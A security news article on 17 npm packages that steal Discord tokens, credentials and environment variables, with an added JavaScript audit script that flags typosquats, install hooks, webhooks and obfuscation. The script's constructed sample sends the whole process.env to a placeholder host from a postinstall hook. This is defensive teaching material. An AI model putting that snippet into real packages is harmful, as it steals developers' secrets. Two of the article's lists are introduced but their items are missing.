Malicious npm Code Packages Built for Hijacking Discord Servers – Threatpost

The lurking code-bombs lift Discord tokens from users of any applications that pulled the packages into their code bases.
A series of malicious packages in the Node.js package manager (npm) code repository are looking to harvest Discord tokens, which can be used to take over unsuspecting users’ accounts and servers.
The npm repository is an open-source home for JavaScript developers to share and reuse code blocks. The packages can represent a supply-chain threat because they are used as building blocks in many web applications, and any application that incorporates the malicious code can in turn attack its own users.
According to the JFrog Security research team, in this case a set of 17 malicious packages were published, with varying payloads and tactics. However, they were all built to target Discord, the virtual meeting platform used by 350 million users that enables communication via voice calls, video calls, text messaging and files.
“The packages’ payloads are varied, ranging from infostealers up to full remote-access backdoors,” researchers said in a Wednesday advisory. “Additionally, the packages have different infection tactics, including typosquatting, dependency confusion and trojan functionality.”
There are a few reasons, apart from its massive user base, that Discord is an attractive target, researchers noted:
JFrog researchers noted that it’s easy to find Discord token grabbers on GitHub, which come complete with instructions. These can be used to develop a malware-laden package.
“Any novice hacker can do this with ease in a matter of minutes,” they said. “It’s important to note these payloads are less likely to be caught by antivirus solutions, versus a full-on RAT backdoor, since a Discord stealer does not modify any files, does not register itself anywhere (to be executed on next boot, for example) and does not perform suspicious operations such as spawning child processes.”
To lure users into downloading the packages, the malicious projects employ various tactics. For instance, two of the 17 packages, called “discord-lofy” and “discord-selfbot-v14,” masquerade as modifications of the legitimate library discord.js, which enables interaction with the Discord API.
“The malware’s author took the original discord.js library as the base and injected obfuscated malicious code into the file src/client/actions/UserGet.js,” according to JFrog, which added, “In classic trojan manner, the packages attempt to misdirect the victim by copying the README.md from the original package.”
Another, dubbed the “fix-error” package, claims to “fix errors in discord selfbot.” In actuality, it uses an obfuscated version of the PirateStealer tool, which injects malicious JavaScript code into the Discord client to steal private data stored there, such as credit cards, login credentials and personally identifiable information (PII).
“The injected code spies on the user and sends back the stolen information to a hardcoded Webhook address,” researchers explained.
Fully 10 of the packages eschew any legitimate or trojanized functionality at all, and instead just contain a small snippet of malicious code, researchers said. These all steal environment variables, which are dynamic-named values that can affect the way running processes will behave on a computer.
“This is a dangerous payload since environment variables are a prime location for keeping secrets that need to be used by the runtime (as they are safer than keeping the secrets in cleartext storage or passing the secrets via command-line variables),” researchers explained. “The types of machines targeted by these malicious packages, namely developer and CI/CD machines, are very likely to contain such secrets and access keys in the user’s environment.”
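To make the indicators in the preceding paragraphs concrete (a lookalike of a popular library such as discord.js, hardcoded webhook addresses, obfuscated code, and small snippets that ship environment variables off a developer or CI machine), here is an added example of a static audit that can be run over a package before it is installed. It is not JFrog's tooling and not code from any of the packages discussed; the sample package contents, the watch-list of popular names, the rule names and the host example.invalid are all constructed for the demonstration.

```javascript
// Added example: a small static audit for npm package contents.
// Package files are supplied in memory so the script runs offline.

// Assumed watch-list of popular names to compare package names against.
const POPULAR_NAMES = ['discord.js', 'express', 'lodash', 'axios'];

// Levenshtein edit distance, used for the lookalike-name check.
function editDistance(a, b) {
  const dp = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) dp[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      dp[i][j] = Math.min(
        dp[i - 1][j] + 1,
        dp[i][j - 1] + 1,
        dp[i - 1][j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1)
      );
    }
  }
  return dp[a.length][b.length];
}

// Returns a list of { rule, detail } findings for a package given as
// { files: { 'package.json': '...', 'index.js': '...' } }.
function auditPackage(pkg) {
  const findings = [];
  const manifest = JSON.parse(pkg.files['package.json']);

  // 1. Lifecycle hooks run automatically on `npm install`.
  const scripts = manifest.scripts || {};
  for (const hook of ['preinstall', 'install', 'postinstall']) {
    if (scripts[hook]) findings.push({ rule: 'lifecycle-script', detail: `${hook}: ${scripts[hook]}` });
  }

  // 2. Name within two edits of a popular package (typosquat candidate).
  for (const name of POPULAR_NAMES) {
    const d = editDistance(manifest.name, name);
    if (d > 0 && d <= 2) findings.push({ rule: 'lookalike-name', detail: `${manifest.name} ~ ${name}` });
  }

  // 3. Source-level indicators: env access next to network I/O,
  //    a hardcoded Discord webhook URL, and common obfuscation idioms.
  for (const [path, src] of Object.entries(pkg.files)) {
    if (!path.endsWith('.js')) continue;
    const readsEnv = /process\.env\b/.test(src);
    const sendsNetwork = /\b(https?\.request|fetch|XMLHttpRequest|net\.connect)\b/.test(src);
    if (readsEnv && sendsNetwork) findings.push({ rule: 'env-exfil', detail: path });
    if (/https:\/\/(?:canary\.|ptb\.)?discord(?:app)?\.com\/api\/webhooks\//.test(src)) {
      findings.push({ rule: 'hardcoded-webhook', detail: path });
    }
    if (/\b(eval|Function)\s*\(|String\.fromCharCode|(\\x[0-9a-f]{2}){4}/i.test(src)) {
      findings.push({ rule: 'obfuscation', detail: path });
    }
  }
  return findings;
}

// Constructed sample (not a real package): lookalike name, a postinstall
// hook, and a snippet that serializes process.env and sends it out.
const SAMPLE_PACKAGE = {
  files: {
    'package.json': JSON.stringify({
      name: 'discrod.js',
      version: '1.0.0',
      scripts: { postinstall: 'node index.js' },
    }),
    'index.js': [
      "const https = require('https');",
      'const payload = JSON.stringify(process.env);',
      "https.request({ host: 'example.invalid', method: 'POST', path: '/c' }).end(payload);",
    ].join('\n'),
  },
};

// Constructed benign package for comparison.
const CLEAN_PACKAGE = {
  files: {
    'package.json': JSON.stringify({ name: 'my-app', version: '1.0.0' }),
    'index.js': 'module.exports = () => 1;',
  },
};

for (const f of auditPackage(SAMPLE_PACKAGE)) console.log(`${f.rule}: ${f.detail}`);
console.log(`clean package findings: ${auditPackage(CLEAN_PACKAGE).length}`);
```

A check like this belongs in CI before `npm install`, and it pairs with npm's own `--ignore-scripts` flag (or `ignore-scripts=true` in `.npmrc`), which stops install hooks from executing at all; the source-level rules are heuristics and will not catch every payload, so treat a hit as a reason to read the package, not as proof of malice.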
The npm code maintainers have removed the flagged packages, which nonetheless live on in any applications they’re built into.
Using malicious packages as a cyberattack vector has become more and more common, and not just in npm. Here’s a rundown of recent discoveries:
“We are witnessing a recent barrage of malicious software hosted and delivered through open-source software repositories,” according to JFrog researchers. “Public repositories have become a handy instrument for malware distribution: the repository’s server is a trusted resource, and communication with it does not raise the suspicion of any antivirus or firewall. In addition, the ease of installation via automation tools such as the npm client provides a ripe attack vector.”